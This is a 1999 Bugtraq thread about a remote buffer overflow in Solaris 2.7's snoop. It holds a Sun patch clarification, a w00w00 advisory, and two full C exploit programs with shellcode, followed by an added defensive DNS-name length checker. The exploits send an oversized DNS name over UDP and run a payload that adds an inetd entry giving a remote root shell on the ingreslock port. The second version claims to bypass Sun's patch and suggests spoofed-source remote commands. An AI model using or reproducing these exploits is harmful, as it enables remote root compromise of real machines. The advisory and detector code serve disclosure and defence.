In case you don't know, both ISS and w00w00 have recently produced snoop advisories; this is Chok Poh (of Sun Microsystems)'s response to Alfred Huger's request for clarification on which patches fix what.

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:57:10 -0800
From: Alfred Huger
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s) (fwd)

---------- Forwarded message ----------
Date: Thu, 9 Dec 1999 14:53:56 -0800 (PST)
From: Chok Poh
To: ah@SECURITYFOCUS.COM
Subject: Clarification needed on the snoop vuln(s)

Alfred,

The patches that Sun has released were in relation to the buffer overflow problem reported by ISS. We are producing patches for the problem posted by w00w00.

Chok
__________________________________________________________________________
Chok Poh
Sun Security Coordination Team
Sun Microsystems, Inc.
email: security-alert@sun.com
__________________________________________________________________________

Date: Tue, 7 Dec 1999 04:42:06 +0300 (MSK)
From: Matt Conover
To: news@technotronic.com
cc: w00w00@blackops.org
Subject: [w00giving #8] Solaris 2.7's snoop

[Note: as we promised, our website and technotronic will get this advisory before anything else does. Thanks for participating in technotronic.]

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Snoop is a program similar to tcpdump that allows one to watch network traffic. There is a buffer overflow in the snoop program when run in verbose (-v) mode that occurs when a domain name greater than 1024 bytes is logged, because it will overwrite a buffer in print_domain_name. This vulnerability allows remote access to the system with the privileges of the user who ran snoop (usually root, because it requires read privileges on special devices).
---------------------------------------------------------------------------
Exploit (by cheez):

/*
 * Remote Solaris 2.7 x86 snoop exploit
 * Run with ( ./snp ) | nc -u target_host_network 53
 * requires target host to be running "snoop -v"
 * Thanks str/horizon for shellcodes (hi plaguez)
 */

#include <stdio.h>    /* fprintf, printf */
#include <stdlib.h>   /* strtol, strtoul */
#include <string.h>   /* memset, memcpy, strlen */
/* a fourth #include was present but its header name was lost in extraction */

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;"
"echo \"ingreslock stream tcp nowait root /bin/sh sh -i\" >> /tmp/w00;"
"/usr/sbin/inetd -s /tmp/w00; /bin/rm -f /tmp/w00";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

char buffer[SIZE];
const char x86_nop = 0x90;
long nop = NOPDEF, esp = 0x8047344, offset = DEFOFF;

int main(int argc, char *argv[])
{
    int i;

    /* optional arguments: return-address offset and NOP-sled length adjustment */
    if (argc > 1)
        offset += strtol(argv[1], NULL, 0);
    if (argc > 2)
        nop += strtoul(argv[2], NULL, 0);

    /* NOP sled, then the payload, then the buffer filled with the guessed address */
    memset(buffer, x86_nop, SIZE);
    memcpy(buffer + nop, shell, strlen(shell));
    for (i = nop + strlen(shell); i < SIZE - 4; i += 4)
        *((int *) &buffer[i]) = esp + offset;

    fprintf(stderr, "0x%x\n", esp + offset);
    printf("%s", buffer);
    return 0;
}

---------------------------------------------------------------------------
Patch:

Because Sun Microsystems doesn't include source, we must wait for them to release a patch.
---------------------------------------------------------------------------
http://www.roses-labs.com, http://www.napster.com, http://www.technotronic.com, http://www.w00w00.org

-----Original Message-----
From: Matt Conover
To: news@technotronic.com
Subject: Re: [w00giving #8] Solaris 2.7's snoop

w00w00 Security Development (WSD)
http://www.w00w00.org/advisories.html

Discovered by: K2 (ktwo@ktwo.ca)

Hi,

Here's a new version of my snoop exploit. It seems that it will work on the new patched version of snoop as well, and actually, the target host does NOT have to be running with -v. Some interesting applications would be to spoof the source and have it issue a remote command other than loading a portshell.

K2
w00w00

/*
 * by: K2, version .2
 * this is a funny Solaris.
 * remote Solaris 2.7 x86 snoop exploit
 * rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW
 * run with ( ./snp ) | nc -u target_host_network 53
 * requires target host to be running "snoop"
 * verified with patch 108483-01
 * thx str/horizon for shellcodes. Hi plageuz Hi mom.
 */

#include <stdio.h>    /* fprintf, printf */
#include <stdlib.h>   /* strtol, strtoul */
#include <string.h>   /* memset, memcpy, strlen */
/* a fourth #include was present but its header name was lost in extraction */

char shell[] =
"\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89"
"\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D"
"\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89"
"\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51"
"\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF"
"\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39"
"\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73"
"\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock"
"stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;"
"/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0";

#define SIZE 2048
#define NOPDEF 349
#define DEFOFF 0

const char x86_nop = 0x90;
long nop = NOPDEF, esp = 0x804646c;
long offset = DEFOFF;
char buffer[SIZE];

int main(int argc, char *argv[])
{
    int i;

    /* optional arguments: return-address offset and NOP-sled length adjustment */
    if (argc > 1)
        offset += strtol(argv[1], NULL, 0);
    if (argc > 2)
        nop += strtoul(argv[2], NULL, 0);

    /* NOP sled, then the payload, then the buffer filled with the guessed address */
    memset(buffer, x86_nop, SIZE);
    memcpy(buffer + nop, shell, strlen(shell));
    for (i = nop + strlen(shell); i < SIZE - 4; i += 4) {
        *((int *) &buffer[i]) = esp + offset;
    }

    fprintf(stderr, "0x%x\n", esp + offset);
    printf("%s", buffer);
    return 0;
}
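The advisory's trigger, a domain name longer than snoop's 1024-byte buffer, is also a protocol violation: RFC 1035 caps a wire-format DNS name at 255 octets, so a monitor can alert on such queries before a decoder ever formats them. The following is an added example (not code from the advisory, from w00w00, or from Sun): a C parser that walks a DNS question name with every read bounds-checked and compression pointers hop-limited, which is the discipline a -v decoder needs, and flags names over the limit; the sample packet builder and all its values are constructed here.

```c
#include <stdint.h>
#include <string.h>
#define DNS_NAME_MAX 255  /* RFC 1035 limit; the advisory's overflow needs > 1024 */

/* Decoded length of the name at 'off', or -1 if malformed, truncated or looping. */
static int dns_name_len(const uint8_t *pkt, size_t len, size_t off)
{
    int total = 0, hops = 0;
    while (off < len) {
        uint8_t c = pkt[off];
        if (c == 0) return total;                        /* root label ends the name */
        if ((c & 0xC0) == 0xC0) {                        /* 2-byte compression pointer */
            if (off + 1 >= len || ++hops > 16) return -1;
            off = ((c & 0x3F) << 8) | pkt[off + 1]; continue;
        }
        if ((c & 0xC0) || off + 1 + c > len) return -1;  /* reserved bits or overrun */
        total += c + (total ? 1 : 0);                    /* label plus joining dot */
        off += 1 + c;
    }
    return -1;                                           /* no terminating label */
}

/* 1 if the first question name exceeds DNS_NAME_MAX, 0 if fine, -1 if unparseable. */
int dns_question_oversized(const uint8_t *pkt, size_t len)
{
    int n = len < 12 ? -1 : dns_name_len(pkt, len, 12);  /* header is 12 bytes */
    return n < 0 ? -1 : n > DNS_NAME_MAX;
}
/* Constructed query (not captured traffic): 'nlabels' labels of 'label_len' 'a's. */
size_t build_query(uint8_t *out, size_t cap, int nlabels, int label_len)
{
    size_t off = 12, need = 12 + (size_t)nlabels * (label_len + 1) + 5;
    if (need > cap || label_len < 1 || label_len > 63) return 0;
    memset(out, 0, need);
    out[1] = 1; out[2] = 1; out[5] = 1;                  /* ID=1, RD, QDCOUNT=1 */
    for (int i = 0; i < nlabels; i++, off += label_len) {
        out[off++] = (uint8_t)label_len;
        memset(out + off, 'a', label_len);
    }
    out[off + 2] = 1; out[off + 4] = 1;                  /* root label, QTYPE=A, QCLASS=IN */
    return off + 5;
}
/* Classify a constructed query; 'trunc' > 0 pretends the packet was cut to that size. */
int classify_sample(int nlabels, int label_len, size_t trunc)
{
    static uint8_t pkt[2048];
    size_t n = build_query(pkt, sizeof pkt, nlabels, label_len);
    return n ? dns_question_oversized(pkt, trunc ? trunc : n) : -1;
}
```

A 17-label name of 63-byte labels decodes to 1087 bytes, which both violates the RFC limit and exceeds the 1024-byte buffer the advisory describes, so it is reported as oversized rather than passed to a formatter.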